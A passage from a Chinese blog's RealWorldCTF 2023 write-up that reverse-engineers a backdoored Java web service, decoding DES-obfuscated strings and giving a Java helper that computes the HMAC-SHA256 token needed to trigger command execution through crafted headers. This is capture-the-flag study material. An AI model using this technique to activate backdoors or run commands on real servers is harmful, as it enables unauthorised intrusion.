<p><img src="/2023/01/13/rwctf2023/assets/image-20230114121558416.png" alt="image-20230114121558416"></p>
<p>能猜到刚刚就是在用des解密文还原明文，由于函数其实不是很多，我们很快就能在反编译的代码中找到对应代码：</p>
<p><img src="/2023/01/13/rwctf2023/assets/image-20230114121856168.png" alt="image-20230114121856168"></p>
<p>一眼丁真，这是就是在解DES，看到这个函数传了两个参数<code>arg13</code>和<code>arg14</code>，前者为还原的明文数组下标，后者是初始密钥。猜测刚刚是在还原4，再结合调用，很快搜到了调用处：</p>
<p><img src="/2023/01/13/rwctf2023/assets/image-20230114122108102.png" alt="image-20230114122108102"></p>
<p>很明显是这里是在解密文，我们把刚刚部分的代码抄过来手动还原能得到一系列明文，cmd，User-Agent,Victory or death!,The Argent Dawn等等，到后面还有HmacSHA256，runtime，exec等等。后面的代码框架有点像内存马打回显的部分，想必看到这应该就能猜出来干啥了：就是让你去改一系列请求头满足后就可以直接RCE了。</p>
<p>所以重点关注if条件语句即可，结合动调，v1，v2字符串调用了getHeader，应该是对请求字段的字符串相等判断，v3相对复杂了一些，用了getParameter，应该是获取GET参数，之后进行了一个HmacSHA256的判断。</p>
<p><img src="/2023/01/13/rwctf2023/assets/image-20230114122607549.png" alt="image-20230114122607549"></p>
<p>其中在最后一个if这里卡住了，这里光看源码和动调并不知道是怎么将hmac输出的byte数组转为String再和get参数比较的，但我随便在那个位置按了一下tab，还原出对应的（这个叫汇编吗），看到了Base64Encoder，思路就很清晰了。</p>
<p><img src="/2023/01/13/rwctf2023/assets/image-20230114123039364.png" alt="image-20230114123039364"></p>
<p>最后的exp:</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.io.UnsupportedEncodingException;</span><br><span class="line"><span class="keyword">import</span> java.net.URLEncoder;</span><br><span class="line"><span class="keyword">import</span> java.security.InvalidAlgorithmParameterException;</span><br><span class="line"><span class="keyword">import</span> java.security.InvalidKeyException;</span><br><span class="line"><span class="keyword">import</span> java.security.NoSuchAlgorithmException;</span><br><span class="line"><span class="keyword">import</span> java.security.spec.InvalidKeySpecException;</span><br><span class="line"><span class="keyword">import</span> java.util.Arrays;</span><br><span class="line"><span class="keyword">import</span> java.util.Base64;</span><br><span class="line"><span class="keyword">import</span> java.util.Random;</span><br><span class="line"><span class="keyword">import</span> javax.crypto.*;</span><br><span class="line"><span class="keyword">import</span> javax.crypto.spec.DESKeySpec;</span><br><span class="line"><span class="keyword">import</span> javax.crypto.spec.IvParameterSpec;</span><br><span class="line"><span class="keyword">import</span> javax.crypto.spec.SecretKeySpec;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">test</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="keyword">static</span> String[] base64_str;</span><br><span class="line">    <span class="keyword">static</span> &#123;</span><br><span class="line">        base64_str = <span class="keyword">new</span> String[<span class="number">0x76</span>];</span><br><span class="line">        base64_str[<span class="number">0</span>] = <span class="string">&quot;0Ez0xGp13BQ6RMtXF5tAvqKzYLqqGvPf&quot;</span>;</span><br><span class="line">        base64_str[<span class="number">1</span>] = ***;</span><br><span class="line">        ....</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> String <span class="title">decode</span><span class="params">(<span class="keyword">int</span> arg13, <span class="keyword">long</span> arg14)</span> <span class="keyword">throws</span> NoSuchPaddingException, NoSuchAlgorithmException, IllegalBlockSizeException, BadPaddingException, InvalidKeyException, InvalidKeySpecException, InvalidAlgorithmParameterException </span>&#123;</span><br><span class="line">        <span class="keyword">long</span> v2 = <span class="number">0x60L</span> ^ arg14 ^ <span class="number">0x3F40B9DFD534CF89L</span>;</span><br><span class="line">        Cipher v4 = Cipher.getInstance(<span class="string">&quot;DES/CBC/PKCS5Padding&quot;</span>);</span><br><span class="line">        SecretKeyFactory v5 = SecretKeyFactory.getInstance(<span class="string">&quot;DES&quot;</span>);</span><br><span class="line">        <span class="keyword">byte</span>[] v6 = <span class="keyword">new</span> <span class="keyword">byte</span>[<span class="number">8</span>];</span><br><span class="line">        v6[<span class="number">0</span>] = (<span class="keyword">byte</span>) (((<span class="keyword">int</span>) (v2 &gt;&gt;&gt; <span class="number">56</span>)));</span><br><span class="line">        <span class="keyword">int</span> v0_3;</span><br><span class="line">        <span class="keyword">for</span> (v0_3 = <span class="number">1</span>; v0_3 &lt; <span class="number">8</span>; ++v0_3) &#123;</span><br><span class="line">            v6[v0_3] = (<span class="keyword">byte</span>) (((<span class="keyword">int</span>) (v2 &lt;&lt; v0_3 * <span class="number">8</span> &gt;&gt;&gt; <span class="number">56</span> &lt;&lt; arg13)));</span><br><span class="line">        &#125;</span><br><span class="line">        v4.init(<span class="number">2</span>, v5.generateSecret(<span class="keyword">new</span> DESKeySpec(v6)), <span class="keyword">new</span> IvParameterSpec(<span class="keyword">new</span> <span class="keyword">byte</span>[<span class="number">8</span>]));</span><br><span class="line">        <span class="keyword">return</span> <span class="keyword">new</span> String(v4.doFinal(Base64.getDecoder().decode(base64_str[arg13])));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">encrypt</span><span class="params">()</span> <span class="keyword">throws</span> UnsupportedEncodingException, InvalidKeyException, NoSuchAlgorithmException, InvalidAlgorithmParameterException, NoSuchPaddingException, IllegalBlockSizeException, BadPaddingException, InvalidKeySpecException </span>&#123;</span><br><span class="line">        String secret = decode(<span class="number">27</span>, <span class="number">0xE7327C51BB50A93EL</span>);</span><br><span class="line">        String message = decode(<span class="number">36</span>, <span class="number">0xE7327C51BB50A93EL</span>);</span><br><span class="line">        Mac sha256_HMAC = Mac.getInstance(<span class="string">&quot;HmacSHA256&quot;</span>);</span><br><span class="line">        SecretKeySpec secretKey = <span class="keyword">new</span> SecretKeySpec(secret.getBytes(<span class="string">&quot;utf-8&quot;</span>), <span class="string">&quot;HmacSHA256&quot;</span>);</span><br><span class="line">        sha256_HMAC.init(secretKey);</span><br><span class="line">        <span class="keyword">byte</span>[] hash = sha256_HMAC.doFinal(message.getBytes(<span class="string">&quot;utf-8&quot;</span>));</span><br><span class="line">        System.out.println(<span class="keyword">new</span> String(Base64.getEncoder().encode(hash)));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        encrypt();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>拿下。</p>
<p><img src="/2023/01/13/rwctf2023/assets/image-20230114123224160.png" alt="image-20230114123224160"></p>
<h3 id="总结："><a href="#总结：" class="headerlink" title="总结："></a>总结：</h3><p>我也不知道自己通过这个题学了啥，算是了解了简单的webservices，还有根据漏洞报告和github的修改部分以及官方文档复现CVE的过程，以及后续对java的逆向有了一些进步，但做出来还是很爽的。</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/12/01/neo4j-tabby%E5%AD%A6%E4%B9%A0/" rel="prev" title="neo4j&tabby学习">
      <i class="fa fa-chevron-left"></i> neo4j&tabby学习
    </a></div>
      <div class="post-nav-item"></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#RealWorldCTF2023"><span class="nav-number">1.</span> <span class="nav-text">RealWorldCTF2023</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#ChatUWU"><span class="nav-number">1.1.</span> <span class="nav-text">ChatUWU</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%A2%98%E7%9B%AE%E6%8F%8F%E8%BF%B0"><span class="nav-number">1.1.1.</span> <span class="nav-text">题目描述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E8%A7%A3%E6%B3%95"><span class="nav-number">1.1.2.</span> <span class="nav-text">解法</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">1.1.3.</span> <span class="nav-text">总结</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#The-Dark-Portal"><span class="nav-number">1.2.</span> <span class="nav-text">The Dark Portal</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#CVE-2022-46364"><span class="nav-number">1.2.1.</span> <span class="nav-text">CVE-2022-46364</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#IDEA%E6%90%AD%E5%BB%BAtomcat%E9%83%A8%E7%BD%B2war%E5%8C%85%E5%8A%A8%E8%B0%83%E7%8E%AF%E5%A2%83"><span class="nav-number">1.2.2.</span> <span class="nav-text">IDEA搭建tomcat部署war包动调环境</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E7%BB%93%E5%90%88jeb%E9%80%86%E5%90%91%E5%88%86%E6%9E%90"><span class="nav-number">1.2.3.</span> <span class="nav-text">结合jeb逆向分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%BB%E7%BB%93%EF%BC%9A"><span class="nav-number">1.2.4.</span> <span class="nav-text">总结：</span></a></li></ol></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="FYHSSGSS"
      src="/images/saiki.jpg">
  <p class="site-author-name" itemprop="name">FYHSSGSS</p>
  <div class="site-description" itemprop="description">Do you like what you see</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives">
          <span class="site-state-item-count">21</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/FYHSSGSS" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;FYHSSGSS" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="https://www.cnblogs.com/FYH-SSGSS" title="Cnblog → https:&#x2F;&#x2F;www.cnblogs.com&#x2F;FYH-SSGSS" rel="noopener" target="_blank"><i class="fab fa-bimobject fa-fw"></i>Cnblog</a>
      </span>
  </div>
  <div class="cc-license motion-element" itemprop="license">
    <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-en" class="cc-opacity" rel="noopener" target="_blank"><img src="/images/cc-by-nc-sa.svg" alt="Creative Commons"></a>
  </div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title"><i class="fa fa-link fa-fw"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://selia1078.github.io/" title="https:&#x2F;&#x2F;selia1078.github.io&#x2F;" rel="noopener" target="_blank">selia❤</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://s0uthwood.github.io/" title="https:&#x2F;&#x2F;s0uthwood.github.io" rel="noopener" target="_blank">s0uthwood</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://kfxp12138.github.io/" title="https:&#x2F;&#x2F;kfxp12138.github.io" rel="noopener" target="_blank">triplewing</a>
        </li>
        <li class="links-of-blogroll-item">
          <a href="https://justloseit.top/" title="https:&#x2F;&#x2F;justloseit.top&#x2F;" rel="noopener" target="_blank">Joker</a>
        </li>
    </ul>
  </div>

      </div>
      <div id="music163player">
      <iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=330 height=86 src="//music.163.com/outchain/player?type=2&id=30482386&auto=1&height=66"></iframe>
      </iframe>
    </div>
    
    </div>
    
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 2021 – 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-flag"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">FYHSSGSS</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-chart-area"></i>
    </span>
      <span class="post-meta-item-text">站点总字数：</span>
    <span title="站点总字数">199k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">3:01</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,0' opacity='0.5' zIndex='-1' count='150' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

  

</body>
</html>
